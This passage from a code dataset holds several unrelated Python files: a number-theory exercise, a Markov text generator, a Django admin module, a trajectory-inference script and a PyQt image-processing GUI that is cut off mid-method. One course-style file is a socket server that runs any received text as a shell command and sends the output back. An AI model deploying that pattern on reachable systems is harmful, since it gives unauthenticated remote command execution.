Note that both routines will be tested independently, so do not rename the methods or write all the logic in \n get_oct_magic_numbers method.\n'''\n\n# Given a number, returns True if it is a magic number in base 8, else False\n# raise ValueError if number < 0\ndef no(res):\n str1=oct(res)\n res1=0\n for i in str1[2:]:\n res1=res1*10+(int(i))\n return res1\n\ndef is_oct_magic(number):\n if(number<0):\n raise ValueError(\"No. less than 0\")\n temp=number\n if (temp >= 0 and temp <= 7):\n if (temp != 1):\n return False\n else:\n return True\n while True:\n e=str(temp)\n res=0\n for i in e:\n res=res+(int(i))**2\n res=no(res)\n if(res>=0 and res<=9):\n if(res!=1):\n return False\n else:\n return True\n temp=res\n\n\n# This method makes use of is_oct_magic and returns a list of 1st k magic numbers in base 8\ndef get_oct_magic_numbers(k):\n if(k<0):\n raise ValueError(\"less than 0\")\n res=[]\n count=0\n n=1\n while True:\n if(count==k):\n return res\n if(is_oct_magic(n)):\n res.append(n)\n count=count+1\n n=n+1\n\n\n# some basic tests given, write more according to given constraints. at least check that\n# you can generate 10 magic numbers\n\ndef test_is_oct_magic():\n assert is_oct_magic(12) == False\n assert is_oct_magic(1)==True\n\ndef test_get_oct_magic_numbers():\n assert [1, 8] == get_oct_magic_numbers(2)","sub_path":"mocktest1_probem4.py","file_name":"mocktest1_probem4.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"198318132","text":"from discord.ext.commands import Bot, Cog, Context, CommandInvokeError\n\n__all__ = [\"CustomCog\"]\n\nclass CustomCog(Cog):\n async def cog_command_error(self, ctx: Context, error: Exception):\n \"\"\"\n Handles errors for custom cogs\n \"\"\"\n if isinstance(error, CommandInvokeError):\n await ctx.send(error.original)\n else:\n await ctx.send(error)","sub_path":"bot/cogs/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"57303825","text":"\n\nfrom xai.brain.wordbase.nouns._fluke import _FLUKE\n\n#class header\nclass _FLUKES(_FLUKE, ):\n\tdef __init__(self,): \n\t\t_FLUKE.__init__(self)\n\t\tself.name = \"FLUKES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"fluke\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_flukes.py","file_name":"_flukes.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"291908679","text":"from matplotlib import pyplot as plt\nfrom vis_utils import visualize_grid\nimport numpy as np\n\n\ndef show_traning(loss_history, train_acc_history, val_acc_history):\n plt.subplot(2, 1, 1)\n plt.plot(loss_history, 'o')\n plt.xlabel('iteration')\n plt.ylabel('loss')\n\n plt.subplot(2, 1, 2)\n plt.plot(train_acc_history, '-o')\n plt.plot(val_acc_history, '-o')\n plt.legend(['train', 'val'], loc='upper left')\n plt.xlabel('epoch')\n plt.ylabel('accuracy')\n\n plt.show()\n\n\ndef compare_trainings(loss_train_val_acc_with_labels):\n plt.subplot(3, 1, 1)\n for label in loss_train_val_acc_with_labels:\n plt.plot(loss_train_val_acc_with_labels[label][0], 'o', label=label)\n plt.title('Train loss')\n plt.xlabel('iteration')\n plt.ylabel('loss')\n plt.legend(ncol=2, loc='lower right')\n \n plt.subplot(3, 1, 2)\n for label in 
loss_train_val_acc_with_labels:\n plt.plot(loss_train_val_acc_with_labels[label][1], '-o', label=label)\n plt.title('Train accuracy')\n plt.xlabel('Epoch')\n plt.ylabel('Accuracy')\n plt.legend(ncol=2, loc='lower right')\n \n plt.subplot(3, 1, 3)\n for label in loss_train_val_acc_with_labels:\n plt.plot(loss_train_val_acc_with_labels[label][2], '-o', label=label)\n plt.title('Val accuracy')\n plt.xlabel('Epoch')\n plt.ylabel('Accuracy')\n plt.legend(ncol=2, loc='lower right')\n \n plt.gcf().set_size_inches(15, 15)\n plt.show()\n\n\ndef plot_mean_std_hist(parameters):\n ws = parameters\n\n ws_means = [np.mean(w) for w in ws]\n ws_stds = [np.std(w) for w in ws]\n \n for i in range(len(ws)):\n print('weight index: ', i)\n print('with size ', ws[i].shape)\n print('with mean: %f, std: %f' % (ws_means[i], ws_stds[i]))\n \n plt.figure()\n plt.subplot(121)\n plt.plot(range(len(ws_means)), ws_means, 'ob-')\n plt.title('weights means')\n plt.subplot(122)\n plt.plot(range(len(ws_stds)), ws_stds, 'or-')\n plt.title('weights stds')\n\n plt.figure()\n for i in range(len(ws)):\n plt.subplot(len(ws), 1, i+1)\n #plt.subplot(1, len(ws), i+1)\n plt.hist(ws[i].ravel(), 30)\n plt.title('weights %d hist' % i)\n \n plt.show()\n\n\ndef show_conv_weights(conv_weights):\n grid = visualize_grid(conv_weights)\n plt.imshow(grid.astype('uint8'))\n plt.axis('off')\n plt.gcf().set_size_inches(5, 5)\n plt.show()\n","sub_path":"assignment2/my2/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"372786888","text":"#!/usr/bin/python3\n\"\"\" returns a JSON object \"\"\"\n\nfrom api.v1.views import app_views\nfrom flask import jsonify, request\nfrom models import storage\n\n\n@app_views.route('/status', methods=['GET'])\ndef status():\n \"\"\" return a json status \"\"\"\n if request.method == 'GET':\n return jsonify({\"status\": \"OK\"})\n\n\n@app_views.route('/stats', methods=['GET'])\ndef stats():\n \"\"\" retrieves the number of each object by type \"\"\"\n if request.method == 'GET':\n res = {}\n classes = {\"Amenity\": \"amenities\", \"City\": \"cities\", \"Place\": \"places\",\n \"Review\": \"reviews\", \"State\": \"states\", \"User\": \"users\"}\n for k, v in classes.items():\n res[v] = storage.count(k)\n return jsonify(res)\n","sub_path":"api/v1/views/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"588167427","text":"#!/usr/bin/env python\n\n# Markov text generator, [markov.py](python/markov.py). This program should be called from the command line with two arguments: the name of a file containing text to read, and the number of words to generate. 
For example, if `chains.txt` contains the short story by Frigyes Karinthy, we could run:\n\n# ```bash\n# ./markov.py chains.txt 40\n# ```\n\n#I wrote this chatbot using this link: http://stackoverflow.com/questions/5306729/how-do-markov-chain-chatbots-work\n\nimport random\nimport re\nimport string\nimport sys\n\ntext = str(sys.argv[1]) #text to read\ntotal_words = int(sys.argv[2]) #maximum words?\n\n\nlinestring = open(text, 'r').read()\nlinestring = re.sub(r\"\\n\", \" \", linestring) #get rid of new lines\nlinestring = re.sub(r\"\\\"\", \"\", linestring) #get rid of quotation marks\nwords=linestring.split()\n\n\n#generate key/value pairs of phrases of a given length and the words that follow those phrases\nnum_of_words=2\nword_dict=dict()\n\nfor i in range(len(words)-num_of_words):\n phrase = ' '.join([words[j] for j in range(i, i+num_of_words)])\n if phrase not in word_dict:\n word_dict[phrase]=[words[i+num_of_words]]\n else:\n word_dict[phrase] = word_dict[phrase]+[words[i+num_of_words]]\n\n#pick a random key value to start with\nstarting_phrase = random.choice(list(word_dict.keys()))\nrand_num = random.randint(0, len(word_dict[starting_phrase]) - 1)\nwords = ' '.join([starting_phrase.capitalize(), word_dict[starting_phrase][rand_num]])\nstarting_phrase =starting_phrase.split()[1] + ' ' + word_dict[starting_phrase][rand_num]\n\n#run chat_bot\ncount = num_of_words\nwhile count < total_words:\n try:\n rand_num = random.randint(0, len(word_dict[starting_phrase]) - 1)\n words = ' '.join([words, word_dict[starting_phrase][rand_num]])\n starting_phrase = starting_phrase.split()[1] + ' ' + word_dict[starting_phrase][rand_num]\n except:\n if words[-1] not in string.punctuation: #if we run out of pairs but it isn't the end of a line, make it the end of a sentence.\n words = ''.join([words, '.'])\n starting_phrase = random.choice(list(word_dict.keys())) #generate a new phrase to start a new sentence\n words = ' '.join([words, starting_phrase.capitalize()])\n\n count=count+1\n\n\nprint(re.search(r'(\\A.*)\\..+',words).group(1)+'.') #remove any sentence fragments at the end","sub_path":"python/markov.py","file_name":"markov.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"243001160","text":"from socket import AF_INET, SOCK_STREAM, socket\nimport subprocess\n\nserver = socket(AF_INET, SOCK_STREAM)\nserver.bind(('127.0.0.1', 8090))\nserver.listen(5)\n\nwhile True:\n print('starting...')\n conn, client_addr = server.accept()\n print(client_addr)\n\n while True:\n try:\n cmd = conn.recv(1024)\n if not cmd:\n break\n obj = subprocess.Popen(cmd.decode('utf-8'), shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE\n )\n stdout = obj.stdout.read()\n stderr = obj.stderr.read()\n\n conn.send(stdout+stderr)\n except ConnectionResetError:\n break\n\n conn.close()\nserver.close()\n","sub_path":"course/ssh通信/服务端.py","file_name":"服务端.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"425433792","text":"num1 = float(input(\"Please enter the first number: \"))\nnum2 = float(input(\"Please enter the second number: \"))\noper = input(\"Please choose your operation:(add, subtract, multiply, division)\")\nadd = lambda x, y: x + y\nsub = lambda x, y: x - y\nmul = lambda x, y: x * y\ndiv = lambda x, y: x / y\nif oper == 'add':\n ans = add(num1, num2)\nelif oper == 'subtract':\n ans = sub(num1, num2)\nelif oper == 
'multiply':\n ans = mul(num1, num2)\nelif oper == 'division':\n ans = div(num1, num2)\nelse:\n print(\"Operation not recognized\")\n raise SystemExit\nprint(\"The answer is: \" + str(ans))\n","sub_path":"Practice-11-1-Calculator_Simp.py","file_name":"Practice-11-1-Calculator_Simp.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"151837923","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\n\nfrom .forms import CustomUserChangeForm\nfrom .forms import CustomUserCreationForm\nfrom .models import CustomUser\nfrom .models import Profile\n\n\nclass ProfileInline(admin.StackedInline):\n model = Profile\n can_delete = False\n verbose_name_plural = 'Profile'\n fk_name = 'user'\n\n\n@admin.register(CustomUser)\nclass CustomUserAdmin(UserAdmin):\n inlines = (ProfileInline, )\n list_display = (\n 'username',\n 'get_account_status',\n 'get_scw_username',\n 'get_shibboleth_username',\n 'get_institution',\n 'is_staff',\n )\n list_select_related = ('profile', )\n model = CustomUser\n add_form = CustomUserCreationForm\n form = CustomUserChangeForm\n\n def get_account_status(self, instance):\n return Profile.STATUS_CHOICES[instance.profile.account_status - 1][1]\n\n get_account_status.short_description = 'Account Status'\n\n def get_shibboleth_username(self, instance):\n return instance.profile.shibboleth_username\n\n get_shibboleth_username.short_description = 'Shibboleth Username'\n\n def get_scw_username(self, instance):\n return instance.profile.scw_username\n\n get_scw_username.short_description = 'SCW Username'\n\n def get_institution(self, instance):\n return instance.profile.institution\n\n get_institution.short_description = 'Institution'\n\n def get_inline_instances(self, request, obj=None):\n if not obj:\n return list()\n return super(CustomUserAdmin, self).get_inline_instances(request, obj)\n","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"54083701","text":"#!/usr/local/bin/python\n\n# avoid errors due to no $DISPLAY environment variable available when running sc.pl.paga\nimport matplotlib\nmatplotlib.use('Agg')\n\nimport pandas as pd\nimport numpy as np\nimport h5py\nimport json\n\nimport scanpy.api as sc\nimport anndata\nimport numba\nimport warnings\n\nimport time\ncheckpoints = {}\n\nimport dynclipy\n\n# ____________________________________________________________________________\n# Load data ####\ntask = dynclipy.main()\n\ncounts = task[\"counts\"]\n\nparameters = task[\"parameters\"]\n\nstart_id = task[\"priors\"][\"start_id\"]\nif isinstance(start_id, list):\n start_id = start_id[0]\n\nif \"groups_id\" in task[\"priors\"]:\n groups_id = task[\"priors\"]['groups_id']\nelse:\n groups_id = None\n\n# create dataset\nif groups_id is not None:\n obs = pd.DataFrame(groups_id)\n obs.index = groups_id[\"cell_id\"]\n obs[\"louvain\"] = obs[\"group_id\"].astype(\"category\")\n adata = anndata.AnnData(counts)\n adata.obs = obs\nelse:\n adata = anndata.AnnData(counts)\n\ncheckpoints[\"method_afterpreproc\"] = time.time()\n\n# ____________________________________________________________________________\n# Basic preprocessing ####\n\n# normalisation & filtering\nif counts.shape[1] < 100 and parameters[\"filter_features\"]:\n print(\"You have less than 100 features, but the filter_features parameter is true. 
This will likely result in an error. Disable filter_features to avoid this\")\n\nif parameters[\"filter_features\"]:\n n_top_genes = min(2000, counts.shape[1])\n sc.pp.recipe_zheng17(adata, n_top_genes=n_top_genes)\n\n# precalculating some dimensionality reductions\nsc.tl.pca(adata, n_comps=parameters[\"n_comps\"])\nwith warnings.catch_warnings():\n warnings.simplefilter('ignore', numba.errors.NumbaDeprecationWarning)\n sc.pp.neighbors(adata, n_neighbors=parameters[\"n_neighbors\"])\n\n# denoise the graph by recomputing it in the first few diffusion components\nif parameters[\"n_dcs\"] != 0:\n sc.tl.diffmap(adata, n_comps=parameters[\"n_dcs\"])\n\n# ____________________________________________________________________________\n# Cluster, infer trajectory, infer pseudotime, compute dimension reduction ###\n\n# add grouping if not provided\nif groups_id is None:\n sc.tl.louvain(adata, resolution=parameters[\"resolution\"])\n\n# run paga\nsc.tl.paga(adata)\n\n# compute a layout for the paga graph\n# - this simply uses a Fruchterman-Reingold layout, a tree layout or any other\n# popular graph layout is also possible\n# - to obtain a clean visual representation, one can discard low-confidence edges\n# using the parameter threshold\nsc.pl.paga(adata, threshold=0.01, layout='fr', show=False)\n\n# run dpt for pseudotime information that is overlayed with paga\nadata.uns['iroot'] = np.where(adata.obs.index == start_id)[0][0]\nif parameters[\"n_dcs\"] == 0:\n sc.tl.diffmap(adata)\nsc.tl.dpt(adata, n_dcs = min(adata.obsm.X_diffmap.shape[1], 10))\n\n# run umap for a dimension-reduced embedding, use the positions of the paga\n# graph to initialize this embedding\nif parameters[\"embedding_type\"] == 'umap':\n sc.tl.umap(adata, init_pos='paga')\n dimred_name = 'X_umap'\nelse:\n sc.tl.draw_graph(adata, init_pos='paga')\n dimred_name = \"X_draw_graph_\" + parameters[\"embedding_type\"]\n\ncheckpoints[\"method_aftermethod\"] = time.time()\n\n# ____________________________________________________________________________\n# Process & save output ####\n\n# grouping\ngrouping = pd.DataFrame({\"cell_id\": adata.obs.index, \"group_id\": adata.obs.louvain})\n\n# milestone networks\nmilestone_network = pd.DataFrame(\n adata.uns[\"paga\"][\"connectivities_tree\"].todense(),\n index=adata.obs.louvain.cat.categories,\n columns=adata.obs.louvain.cat.categories\n).stack().reset_index()\nmilestone_network.columns = [\"from\", \"to\", \"length\"]\nmilestone_network = milestone_network.query(\"length > 0\").reset_index(drop=True)\nmilestone_network[\"directed\"] = False\n\n# dimred\ndimred = pd.DataFrame([x for x in adata.obsm[dimred_name].T]).T\ndimred.columns = [\"comp_\" + str(i+1) for i in range(dimred.shape[1])]\ndimred[\"cell_id\"] = adata.obs.index\n\n# branch progressions: the scaled dpt_pseudotime within every cluster\nbranch_progressions = adata.obs\nbranch_progressions[\"dpt_pseudotime\"] = branch_progressions[\"dpt_pseudotime\"].replace([np.inf, -np.inf], 1) # replace unreachable pseudotime with maximal pseudotime\nbranch_progressions[\"percentage\"] = branch_progressions.groupby(\"louvain\")[\"dpt_pseudotime\"].apply(lambda x: (x-x.min())/(x.max() - x.min())).fillna(0.5)\nbranch_progressions[\"cell_id\"] = adata.obs.index\nbranch_progressions[\"branch_id\"] = branch_progressions[\"louvain\"].astype(np.str)\nbranch_progressions = branch_progressions[[\"cell_id\", \"branch_id\", \"percentage\"]]\n\n# branches:\n# - length = difference between max and min dpt_pseudotime within every cluster\n# - directed = not 
yet correctly inferred\nbranches = adata.obs.groupby(\"louvain\").apply(lambda x: x[\"dpt_pseudotime\"].max() - x[\"dpt_pseudotime\"].min()).reset_index()\nbranches.columns = [\"branch_id\", \"length\"]\nbranches[\"branch_id\"] = branches[\"branch_id\"].astype(np.str)\nbranches[\"directed\"] = True\n\n# branch network: determine order of from and to based on difference in average pseudotime\nbranch_network = milestone_network[[\"from\", \"to\"]]\naverage_pseudotime = adata.obs.groupby(\"louvain\")[\"dpt_pseudotime\"].mean()\nfor i, (branch_from, branch_to) in enumerate(zip(branch_network[\"from\"], branch_network[\"to\"])):\n if average_pseudotime[branch_from] > average_pseudotime[branch_to]:\n branch_network.at[i, \"to\"] = branch_from\n branch_network.at[i, \"from\"] = branch_to\n\n# save\ndataset = dynclipy.wrap_data(cell_ids = adata.obs.index)\ndataset.add_branch_trajectory(\n grouping = grouping,\n branch_progressions = branch_progressions,\n branches = branches,\n branch_network = branch_network\n)\ndataset.add_dimred(dimred = dimred)\ndataset.add_timings(checkpoints)\n\ndataset.write_output(task[\"output\"])\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"404033456","text":"import sys\nimport cv2\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtGui\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtGui import QImage, QPixmap\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog, QMessageBox\nfrom PyQt5.QtPrintSupport import QPrintDialog, QPrinter\nfrom PyQt5.uic import loadUi\nimport numpy as np\nfrom scipy import ndimage\nimport scipy as sp\n\n\nclass LoadQt(QMainWindow):\n def __init__(self):\n super(LoadQt, self).__init__()\n loadUi('demo.ui', self)\n self.setWindowIcon(QtGui.QIcon(\"python-icon.png\"))\n\n self.image = None\n self.actionOpen.triggered.connect(self.open_img)\n self.actionSave.triggered.connect(self.save_img)\n self.actionPrint.triggered.connect(self.createPrintDialog)\n self.actionQuit.triggered.connect(self.QuestionMessage)\n self.actionBig.triggered.connect(self.big_Img)\n self.actionSmall.triggered.connect(self.small_Img)\n self.actionQt.triggered.connect(self.AboutMessage)\n self.actionAuthor.triggered.connect(self.AboutMessage2)\n\n #Chapter 2\n self.actionRotation.triggered.connect(self.rotation)\n self.actionAffine.triggered.connect(self.affine)\n\n #Chapter 3\n self.actioAnhXam.triggered.connect(self.anh_Xam)\n self.actionNegative.triggered.connect(self.anh_Negative)\n self.actionHistogram.triggered.connect(self.histogram_Equalization)\n self.actionLog.triggered.connect(self.Log)\n self.actionGamma.triggered.connect(self.gamma)\n\n #Chapter 4\n self.actionGaussan.triggered.connect(self.Gaussian)\n self.actionHigh_Boost.triggered.connect(self.High_Boost)\n self.actionLaplacian.triggered.connect(self.Laplacian)\n self.actionFilter_Average.triggered.connect(self.filter_Average)\n self.actionUnsharp.triggered.connect(self.Unsharp)\n\n #Chapter 5\n self.actionTanSo.triggered.connect(self.Tan_so)\n self.actionIdeal_LPF.triggered.connect(self.imidlp)\n self.actionGaussian_HPF.triggered.connect(self.Gaussian_HighPass)\n #self.actionButterworth_HPF.triggered.connect(self.Butterworth_HighPass)\n\n #Chapter 7\n self.actionDilate.triggered.connect(self.dilate)\n self.actionErode.triggered.connect(self.erode)\n self.actionOpen_2.triggered.connect(self.open)\n self.actionClose.triggered.connect(self.close_)\n 
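# remaining morphology actions: hit-or-miss, gradient, boundary extraction, convex hull\n 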
self.actionHit_miss.triggered.connect(self.hitmis)# error\n self.actionGradient.triggered.connect(self.gradient)\n self.actionMorboundary.triggered.connect(self.morboundary)\n self.actionConvex.triggered.connect(self.convex)\n\n #Chapter 8\n self.actionx_direcction_Sobel.triggered.connect(self.x_Sobel)\n self.actiony_direction_Sobel.triggered.connect(self.y_Sobel)\n self.actionLaplacian_2.triggered.connect(self.sobel_Laplacian)\n self.actionLaplacian_of_Gaussian.triggered.connect(self.lap_of_Gaussian)\n self.actionCanny.triggered.connect(self.img_Canny)\n\n #Set input\n self.dial.valueChanged.connect(self.rotation)\n self.horizontalSlider.valueChanged.connect(self.Gamma_)\n self.size_Img.valueChanged.connect(self.big_Img)\n self.gaussian_QSlider.valueChanged.connect(self.Gaussian)\n self.erosion.valueChanged.connect(self.HinhThai)\n\n self.gray.stateChanged.connect(self.anh_Xam)\n\n self.hist.stateChanged.connect(self.histogram_Equalization)\n\n self.Qlog.valueChanged.connect(self.Log)\n\n self.sobel.stateChanged.connect(self.Sobel)\n self.sobel_x.stateChanged.connect(self.Sobel)\n self.sobel_y.stateChanged.connect(self.Sobel)\n\n self.cbLog.stateChanged.connect(self.Log)\n\n self.cbLap.stateChanged.connect(self.Laplacian)\n\n self.canny.stateChanged.connect(self.Canny)\n self.canny_min.valueChanged.connect(self.Canny)\n self.canny_max.valueChanged.connect(self.Canny)\n\n self.pushButton.clicked.connect(self.reset)\n\n @pyqtSlot()\n def loadImage(self, fname):\n self.image = cv2.imread(fname)\n self.tmp = self.image\n self.displayImage()\n\n def displayImage(self, window=1):\n qformat = QImage.Format_Indexed8\n\n if len(self.image.shape) == 3:\n if(self.image.shape[2]) == 4:\n qformat = QImage.Format_RGBA8888\n else:\n qformat = QImage.Format_RGB888\n img = QImage(self.image, self.image.shape[1], self.image.shape[0], self.image.strides[0], qformat)\n #BGR > RGB\n img = img.rgbSwapped()\n if window == 1:\n self.imgLabel.setPixmap(QPixmap.fromImage(img))\n self.imgLabel.setAlignment(QtCore.Qt.AlignHCenter | QtCore.Qt.AlignVCenter)\n if window == 2:\n self.imgLabel2.setPixmap(QPixmap.fromImage(img))\n self.imgLabel2.setAlignment(QtCore.Qt.AlignHCenter | QtCore.Qt.AlignVCenter)\n\n def open_img(self):\n fname, filter = QFileDialog.getOpenFileName(self, 'Open File', 'C:\\\\Users\\DELL\\PycharmProjects\\DemoPro', \"Image Files (*)\")\n if fname:\n self.loadImage(fname)\n else:\n print(\"Invalid Image\")\n\n def save_img(self):\n fname, filter = QFileDialog.getSaveFileName(self, 'Save File', 'C:\\\\', \"Image Files (*.png)\")\n if fname:\n cv2.imwrite(fname, self.image)\n else:\n print(\"Error\")\n\n def createPrintDialog(self):\n printer = QPrinter(QPrinter.HighResolution)\n dialog = QPrintDialog(printer, self)\n\n if dialog.exec_() == QPrintDialog.Accepted:\n self.imgLabel2.print_(printer)\n\n def big_Img(self):\n self.image = cv2.resize(self.image, None, fx=1.5, fy=1.5, interpolation=cv2.INTER_CUBIC)\n self.displayImage(2)\n\n def small_Img(self):\n self.image = cv2.resize(self.image, None, fx=0.75, fy=0.75, interpolation=cv2.INTER_CUBIC)\n self.displayImage(2)\n\n def reset(self):\n self.image = self.tmp\n self.displayImage(2)\n\n def AboutMessage(self):\n QMessageBox.about(self, \"About Qt - Qt Designer\", \"This program uses Qt version 5.11.1.\")\n def AboutMessage2(self):\n QMessageBox.about(self, \"About Author\", \"Trịnh Hoàng Huy & Nguyễn Minh Hiếu Bốn\")\n\n def QuestionMessage(self):\n message = QMessageBox.question(self, \"Exit\", \"Are you sure you want to exit?\", QMessageBox.Yes | 
QMessageBox.No, QMessageBox.No)\n if message == QMessageBox.Yes:\n print(\"Yes\")\n self.close()\n else:\n print(\"No\")\n\n ################# Chương 2 ##############################################################################\n def rotation(self):\n rows, cols, steps = self.image.shape\n M = cv2.getRotationMatrix2D((cols / 2, rows / 2), 90, 1)\n self.image = cv2.warpAffine(self.image, M, (cols, rows))\n self.displayImage(2)\n\n def affine(self):\n self.image = self.tmp\n rows, cols, ch = self.image.shape\n pts1 = np.float32([[50, 50], [200, 50], [50, 200]])\n pts2 = np.float32([[10, 100], [200, 50], [100, 250]])\n\n M = cv2.getAffineTransform(pts1, pts2)\n self.image = cv2.warpAffine(self.image, M, (cols, rows))\n\n self.displayImage(2)\n\n ################# Chương 3 ##############################################################################\n def anh_Xam(self):\n self.image = self.tmp\n self.image = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n self.displayImage(2)\n\n def anh_Negative(self):\n self.image = self.tmp\n self.image = ~self.image\n self.displayImage(2)\n\n def histogram_Equalization(self):\n self.image = self.tmp\n img_yuv = cv2.cvtColor(self.image, cv2.COLOR_RGB2YUV)\n img_yuv[:, :, 0] = cv2.equalizeHist(img_yuv[:, :, 0])\n self.image = cv2.cvtColor(img_yuv, cv2.COLOR_YUV2RGB)\n self.displayImage(2)\n\n def Log(self):\n self.image = self.tmp\n img_2 = np.uint8(np.log(self.image))\n c = 2\n self.image = cv2.threshold(img_2, c, 225, cv2.THRESH_BINARY)[1]\n self.displayImage(2)\n\n def Gamma_(self, gamma):\n self.image = self.tmp\n gamma = gamma*0.1\n invGamma = 1.0 /gamma\n table = np.array([((i / 255.0) ** invGamma) * 255\n for i in np.arange(0, 256)]).astype(\"uint8\")\n\n self.image = cv2.LUT(self.image, table)\n self.displayImage(2)\n\n def gamma(self, gamma):\n self.image = self.tmp\n gamma = 1.5\n invGamma = 1.0 / gamma\n table = np.array([((i / 255.0) ** invGamma) * 255\n for i in np.arange(0, 256)]).astype(\"uint8\")\n\n self.image = cv2.LUT(self.image, table)\n self.displayImage(2)\n\n ################# Chương 4 ##############################################################################\n def Gaussian(self):\n self.image = self.tmp\n self.image = cv2.GaussianBlur(self.image, (5, 5), 2)\n self.displayImage(2)\n\n def High_Boost(self):\n self.image = self.tmp\n x = np.array([[-1, -1, -1], [-1, 8, -1], [-1, -1, -1]])\n self.image = cv2.filter2D(np.array(self.image), -1, x)\n self.displayImage(2)\n\n def Laplacian(self):\n self.image = self.tmp\n h = np.array([[0, -1, 0], [-1, 5, -1], [0, -1, 0]])\n self.image = cv2.filter2D(np.array(self.image), -1, h)\n self.displayImage(2)\n\n def filter_Average(self):\n self.image = self.tmp\n self.image = cv2.medianBlur(self.image, 5)\n self.displayImage(2)\n\n def Unsharp(self):\n self.image = self.tmp\n gau = cv2.GaussianBlur(self.image, (9, 9), 10.0)\n self.image = cv2.addWeighted(self.image, 1.5, gau, -0.5, 0, self.image)\n self.displayImage(2)\n\n ################# Chương 5 ##############################################################################\n def Tan_so(self):\n self.image = self.tmp\n img_float32 = np.float32(self.image)\n dft = cv2.dft(img_float32, flags=cv2.DFT_COMPLEX_OUTPUT)\n dft_shift = np.fft.fftshift(dft)\n self.image = 20 * np.log(cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))\n self.displayImage(2)\n\n def Ideal_LPF(self,sx, sy, d0):\n hr =(sx) / 2\n hc =(sy) / 2\n\n x = np.arange(-hc, hc)\n y = np.arange(-hr, hr)\n\n [x, y] = np.meshgrid(x, y)\n\n mg = np.sqrt(x ** 2 + y ** 2)\n return 
np.double(mg <= d0)\n\n    def imidlp(self):\n        self.image = self.tmp\n        # the image is a numpy array, so its dimensions come from .shape\n        height, width, channels = self.image.shape\n        H = self.Ideal_LPF(height, width, d0=30)\n        # FFT over the two spatial axes only (axis 2 holds the colour channels)\n        G = np.fft.fftshift(np.fft.fft2(self.image, axes=(0, 1)), axes=(0, 1))\n        # apply the ideal low-pass mask by multiplication; assigning H into the\n        # spectrum (as the original chained assignment did) discards the image\n        if len(G.shape) == 3:\n            Ip = G * H[:, :, np.newaxis]\n        else:\n            Ip = G * H\n        self.image = np.uint8(np.abs(np.fft.ifft2(np.fft.ifftshift(Ip, axes=(0, 1)), axes=(0, 1))))\n        self.displayImage(2)\n\n    '''def Butterworth_HighPass(self):\n        self.image = self.tmp\n        # desired RMS\n        rms = 0.2\n        raw1 = self.image / np.std(self.image)\n        # make the standard deviation to be the desired RMS\n        raw2 = raw1 * rms\n        # convert to frequency domain\n        img_freq = np.fft.fft2(raw2)\n        hp_filt = psychopy.filters.butter2d_hp(size=self.image.shape, cutoff=0.05, n=10)\n        img_filt = np.fft.fftshift(img_freq) * hp_filt\n        img_new = np.real(np.fft.ifft2(np.fft.ifftshift(img_filt)))\n        self.image = img_new\n\n        self.displayImage(2)'''\n\n    def Gaussian_HighPass(self):\n        self.image = self.tmp\n        data = np.array(self.image, dtype=float)\n        lowpass = ndimage.gaussian_filter(data, 50)\n        gauss_highpass = data - lowpass\n        gauss_highpass = np.uint8(gauss_highpass)\n        self.image = ~gauss_highpass\n\n        self.displayImage(2)\n\n    ################# Chương 7 ##############################################################################\n    def dilate(self):\n        self.image = self.tmp\n        kernel = np.ones((2, 6), np.uint8)\n        self.image = cv2.dilate(self.image, kernel, iterations=3)\n        self.displayImage(2)\n\n    def erode(self):\n        self.image = self.tmp\n        kernel = np.ones((4, 7), np.uint8)\n        self.image = cv2.erode(self.tmp, kernel, iterations=3)\n        self.displayImage(2)\n\n    def HinhThai(self , iter):\n        self.image = self.tmp\n        if iter > 0 :\n            kernel = np.ones((4, 7), np.uint8)\n            self.image = cv2.erode(self.tmp, kernel, iterations=iter)\n        else :\n            kernel = np.ones((2, 6), np.uint8)\n            self.image = cv2.dilate(self.image, kernel, iterations=iter*-1)\n        self.displayImage(2)\n\n    def open(self):\n        self.image = self.tmp\n        kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (9, 9))\n        self.image = cv2.morphologyEx(self.image, cv2.MORPH_OPEN, kernel)\n        self.displayImage(2)\n\n    def close_(self):\n        self.image = self.tmp\n        kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (9, 9))\n        self.image = cv2.morphologyEx(self.image, cv2.MORPH_CLOSE, kernel)\n        self.displayImage(2)\n\n    #Lỗi fixed: MORPH_HITMISS needs a single-channel 8-bit image and an integer kernel\n    def hitmis(self):\n        self.image = self.tmp\n        kernel = np.array(([0, 1, 0], [1, -1, 1], [0, 1, 0]), dtype=\"int\")\n        gray = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n        self.image = 